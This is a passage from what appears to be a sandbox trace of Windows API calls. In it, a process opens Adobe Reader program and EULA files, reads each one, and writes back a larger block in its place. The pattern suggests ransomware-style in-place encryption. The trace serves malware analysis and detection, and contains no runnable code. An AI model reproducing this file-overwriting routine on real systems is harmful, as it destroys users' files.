lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe.Reader.Dependencies.manifest", lpUsedDefaultChar=0x0) returned 34 [0068.410] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5c0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2e9f2bc*=0x5c0, lpOverlapped=0x0) returned 1 [0068.425] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0068.425] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0xb48, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xb48, lpOverlapped=0x0) returned 1 [0068.426] CloseHandle (hObject=0x1cc) returned 1 [0068.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.440] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.440] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2000 [0068.440] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.441] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.441] ReleaseMutex (hMutex=0x168) returned 1 [0068.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DEU", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DEU", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.DEU", lpUsedDefaultChar=0x0) returned 11 [0068.441] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0068.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0068.451] WriteFile (in: hFile=0x1fc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0068.455] CloseHandle (hObject=0x1fc) returned 1 [0068.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.457] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0068.457] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.457] ReleaseMutex (hMutex=0x168) returned 1 [0068.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.KOR", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.KOR", lpUsedDefaultChar=0x0) returned 11 [0068.457] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0068.463] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0068.464] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0068.465] CloseHandle (hObject=0x1fc) returned 1 [0068.466] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.467] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0068.467] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.467] ReleaseMutex (hMutex=0x168) returned 1 [0068.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SLV", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SLV", lpUsedDefaultChar=0x0) returned 11 [0068.467] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0068.476] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0068.476] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0068.477] CloseHandle (hObject=0x1fc) returned 1 [0068.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.480] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.481] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0068.481] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.481] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.481] ReleaseMutex (hMutex=0x168) returned 1 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CZE", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CZE", lpUsedDefaultChar=0x0) returned 11 [0068.481] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.203] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0069.203] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.204] CloseHandle (hObject=0x1fc) returned 1 [0069.208] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.209] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.209] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0069.209] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.209] ReleaseMutex (hMutex=0x168) returned 1 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ITA", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.ITA", lpUsedDefaultChar=0x0) returned 11 [0069.210] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.212] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0069.212] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.213] CloseHandle (hObject=0x1fc) returned 1 [0069.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.225] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.225] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0069.225] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.225] ReleaseMutex (hMutex=0x168) returned 1 [0069.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUS", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.RUS", lpUsedDefaultChar=0x0) returned 11 [0069.226] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.228] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0069.228] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.229] CloseHandle (hObject=0x1fc) returned 1 [0069.233] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\eula.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.233] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.234] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x17190 [0069.234] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.234] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.234] ReleaseMutex (hMutex=0x168) returned 1 [0069.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eula.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eula.exe", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Eula.exe", lpUsedDefaultChar=0x0) returned 8 [0069.234] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0069.656] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16190 [0069.656] ReadFile (in: hFile=0x1fc, lpBuffer=0x2865858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2865858*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.737] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16190 [0069.738] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.738] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0069.738] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0069.738] CloseHandle (hObject=0x1fc) returned 1 [0069.741] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.741] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.742] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3a8 [0069.742] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.742] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.742] ReleaseMutex (hMutex=0x168) returned 1 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0069.742] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x3a8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2e9f2bc*=0x3a8, lpOverlapped=0x0) returned 1 [0069.793] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0069.793] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0x930, lpOverlapped=0x0) returned 1 [0069.793] CloseHandle (hObject=0x1fc) returned 1 [0069.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.804] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.804] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4a8 [0069.804] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.804] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.804] ReleaseMutex (hMutex=0x168) returned 1 [0069.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0069.805] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4a8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2e9f2bc*=0x4a8, lpOverlapped=0x0) returned 1 [0069.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0069.862] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa30, lpOverlapped=0x0) returned 1 [0069.862] CloseHandle (hObject=0x1fc) returned 1 [0069.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0069.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4a4 [0069.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0069.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.865] ReleaseMutex (hMutex=0x168) returned 1 [0069.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0069.865] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4a4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2e9f2bc*=0x4a4, lpOverlapped=0x0) returned 1 [0070.164] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.164] WriteFile 